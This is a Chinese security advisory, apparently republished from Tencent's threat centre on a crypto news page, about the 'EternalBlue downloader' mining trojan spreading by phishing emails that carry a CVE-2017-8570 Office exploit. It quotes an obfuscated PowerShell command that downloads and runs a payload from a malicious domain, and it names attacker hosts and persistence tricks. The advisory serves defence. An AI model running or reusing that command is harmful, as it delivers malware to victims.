
“永恒之蓝下载器木马”新增钓鱼邮件传播,利用用户机器挖矿门罗币
编者注:原标题为《“永恒之蓝下载器木马”新增钓鱼邮件传播,附件含CVE-2017-8570漏洞攻击代码》
“永恒之蓝”下载器木马在感染用户机器上运行后,会自动当前用户的邮箱通讯录并发送附件为urgent.doc的文档,该文档附带CVE-2017-8570漏洞(Office高危漏洞,又称沙虫二代)攻击代码。
如果被攻击用户收到邮件并不慎打开文档,就可能触发漏洞执行Powershell命令下载mail.jsp:
C:/Windows/System32/cmd.exe /c powershell IE`x(Ne`w-Obj`ect Net.WebC`lient).DownLoadString(http://ap35nf7.jp/mail.jsp?Administrator*OUHH1)
而下载使用的域名ap35nf7.jp实际上并没有注册,但是依然能够解析到地址:t.awcna.com,是因为被感染机器的本地hosts文件被篡改,使得随机生成的域名映射到木马使用的恶意地址,细节请参考御见威胁情报中心此前发布的报告:《“永恒之蓝下载器”木马篡改hosts指向随机域名,再用多个漏洞攻击内网挖矿》。
本次攻击过程中,木马将使用随机生成的字符加“.cn”或”.jp“或”.kr“后缀作为DGA域名,并在hosts文件中指向域名:
t.tr2q.com,t.awcna.com,t.amynx.com
mail.jsp经过高度混淆,多次解密后可以看到其安装多个计划任务下载Powershell脚本执行,并使用了新的计划任务名:“Bluetea“蓝茶。
“永恒之蓝”下载器木马自出现之后从未停止更新,从最初的PE样本攻击到后来转移为以Powershell无文件攻击方式躲避查杀,并且通过安装多个类型的计划任务进行持久化。在传播方式上,最初通过供应链攻击积累一批感染机器后,又不断利用”永恒之蓝”漏洞,MSSql爆破,$IPC爆破,RDP爆破等方法进行扩散传播,近期又增加了DGA域名攻击和钓鱼邮件攻击,其最终目的只为利用用户机器挖矿门罗币获利。
永恒之蓝下载器木马的历次版本更新参考下表:
安全建议
1.建议用户不要轻易打开不明来源的邮件附件,对于邮件附件中的文件要格外谨慎运行,如发现有脚本或其他可执行文件可先使用杀毒软件进行扫描;
2.服务器使用安全的密码策略,特别是IPC$、MSSQL、RDP账号密码,切勿使用弱口令,避免遭遇弱密码爆破攻击;
3.根据微软安全公告及时修复Office漏洞CVE-2017-8570,需进行漏洞扫描和修复,或采用Windows Update进行。
来源:腾讯御见威胁情报中心
比推快讯
更多 >>- Cantor:将 SOL 作为储备策略优于 ETH,购买 SOL 的公司应以溢价交易
- 美股收盘:三大股指齐涨,Circle(CRCL.K)涨13%
- 数据:现货比特币 ETF 现已占全球 BTC 交易量的 25%
- 摩根大通提交 JPMD 商标申请,列举多个区块链用例
- 特朗普次子否认将在波场「借壳」上市的新公司中担任职务
- Arkham:FTX从Coinbase Prime提出价值 3972 万美元的SOL
- Spark:SPK 将于明日 16:00 开放空投申领
- 特朗普:与加拿大达成贸易协议可在数日或数周内实现
- Purpose XRP ETF 获批拟于 6 月 18 日在多伦多证券交易所上市
- Davis Commodities 推出 3000 万美元战略增长计划,15%投入比特币储备
- 欧洲委员会:关于欧盟接受 10%美国关税的报道是猜测性的
- Jupiter DAO 成员批评项目团队拥有的投票权过大
- 加拿大上市公司 Universal Digital 推出比特币资金储备战略
- OGN DAO 宣布将回购价值超过 300 万美元的 OGN
- Bitwise CEO:投资者似乎正在重新审视以太坊
- TRX 今年迄今表现优于 ETH、SOL 及 BNB,逊于 BTC
- ZachXBT 提醒 WhiteRock Finance(WHITE)项目存在多项风险
- Solana 联创:Cardano 拟将 1 亿美元 ADA 转为比特币的计划“太愚蠢”
- 币安:6 月 17 日起币安 Alpha 代币之间的交易量不计入 Alpha 积分
- 受 Tron 反向合并上市影响,SRM Entertainment 股价大涨 200%
- 美 SEC 延迟对 Franklin 现货以太坊 ETF 的质押选项做出决议
- 过去 7 日波场网络稳定币增加 13.8 亿枚,Avalanche 网络稳定币减少 7.686 亿枚
- 伯恩斯坦:GENIUS 法案一旦生效,稳定币将成为互联网现金层
- 波场将通过「借壳」方式在美国上市,并与特朗普次子成立类 Strategy 公司
- 巴西加密行业不满针对利润统一征收 17.5%税率
- 今日美国比特币 ETF 净流入 2864 枚 BTC,以太坊 ETF 净流出 3748 枚 ETH
- WSJ:伊朗表示希望缓和与以色列的敌对状态
- 美股 Circle 涨幅扩大至 17.89%,市值升至 351.32 亿美元
- 塞尔维亚前总统发文确认其担任 AB 基金会 CEO,正开展慈善事业
- 某聪明钱 45 分钟向 Coinbase 充值 5028 枚 ETH,若卖出将亏损 109.1 万美元
- 美股三大股指高开,特朗普媒体科技集团涨 1.3%
- 分析:美联储或因劳动力数据降温降改变立场
- “树图”创始人龙凡:曾花费 1000 美元购入 100 枚比特币,但卖得太早
- Beat Holdings 寻求募资 7990 亿日元以购买 5 万枚 BTC
- 疑似加密 KOL凉兮与嗯哼同步买入 Meme 币 Moolah
- 数据:过去 24 小时全网爆仓 1.98 亿美元,多单爆仓 7154.00 万,空单爆仓 1.27 亿
- 美股盘前 SRM Entertainment 涨 194.48%,市值升至 2500 万美元
- 币安 Alpha 更新交易对手续费费率
- 萨尔瓦多自与 IMF 达成非积累协议以来增持 240 枚比特币
- 波场市值超越蜜雪冰城,市值升至 269.6 亿美元
- 娱乐公司 SRM 签署 1 亿美元股权融资协议,以启动 TRX 代币储备策略
- Gate 5 月合约交易量环比增长 66%,涨幅居全球首位
- Truth Social 比特币和以太坊 ETF 已向美 SEC 提交注册声明
- Tron 或与 Eric Trump 合作成立类似 Strategy 的公司
- 市场消息:Tron 寻求在美国上市
- 《金融时报》:波场即将上市
- 特朗普手机预计九月上市,售价 499 美元
- 特朗普:特朗普手机将采用“美国制造”的手机和服务
- Trump Organization 推出 Trump Mobile 手机
- Strategy 再次增持 10,100 枚比特币
比推专栏
更多 >>观点
比推热门文章
- Cantor:将 SOL 作为储备策略优于 ETH,购买 SOL 的公司应以溢价交易
- 美股收盘:三大股指齐涨,Circle(CRCL.K)涨13%
- 数据:现货比特币 ETF 现已占全球 BTC 交易量的 25%
- 摩根大通提交 JPMD 商标申请,列举多个区块链用例
- 孙宇晨的纳斯达克赌局:如何用六年「绑定」特朗普家族?
- 特朗普次子否认将在波场「借壳」上市的新公司中担任职务
- Arkham:FTX从Coinbase Prime提出价值 3972 万美元的SOL
- Spark:SPK 将于明日 16:00 开放空投申领
- 特朗普:与加拿大达成贸易协议可在数日或数周内实现
- Purpose XRP ETF 获批拟于 6 月 18 日在多伦多证券交易所上市